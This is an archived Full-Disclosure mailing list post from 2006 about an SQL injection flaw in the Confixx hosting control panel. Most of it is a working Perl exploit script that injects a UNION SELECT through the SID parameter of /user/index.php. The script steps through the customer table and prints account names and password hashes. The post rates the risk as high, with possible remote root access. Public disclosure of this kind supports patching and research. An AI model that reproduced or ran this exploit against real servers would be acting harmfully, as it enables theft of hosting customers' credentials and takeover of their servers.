[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln)
- From: defa <defa@xxxxxxxxxxxx>
- Date: Wed, 19 Apr 2006 00:00:59 +0200
Here is more information on the confixx vuln released by LoK Crew.
Sorry for the poor quality of this posting, I was short of time.
Product:
^^^^^^^
Confixx is a comprehensive control panel that provides the best
value, proven quality, fully developed feature set and quality
support. The software’s powerful features have been especially
designed to meet the requirements of hosting providers.
More -> http://www.swsoft.com/en/products/confixx/
Risk: High - eventually remote root access
^^^^
Serverity: High
^^^^^^^^
Discussion:
^^^^^^^^^^^
The vuln itself can be found in the html/session.inc.php in the
function sessao_read( $sKey ) which is used to overwrite the php-own
session methods.
The file "loginform.php" can be used to display e.g. admin hashes.
Read the rest by studying the attached exploit.
Reference:
^^^^^^^^^^
Vuln was published by LoK-Crew here:
http://venom.sam-city.com/confixx2.txt
Read more:
^^^^^^^^^^^
http://www.securityfocus.com/bid/17476/
Code:
^^^^^
--------------- <snip> -------------
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=========================
confixx_exploit.pl [URL]
params:
[URL] - server url
);
exit;
}
$serv = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;
for ($i=0;$i<=100;$i++)
{
#$i=1;
$hit = 0;
$url = "http://";;
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B8,':%22','HIT:%
20',";
$url .= "kunde,'%20:%20',longpw,'%22;')%20AS%20'sdata'%20FROM%20kunden
%20LIMIT%20";
$url .= "$i,1/*";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"localhost", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $url HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /<p>HIT:/)
{
# $answer =~ s/<[A-Z,a-z,=].+>//g;
print "$answer";
$hit = 1;
}
}
if ($hit == 0) {die("that's it");}
}
--------------- <snap> -------------
bye
defa
--
don't eat yellow snow
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/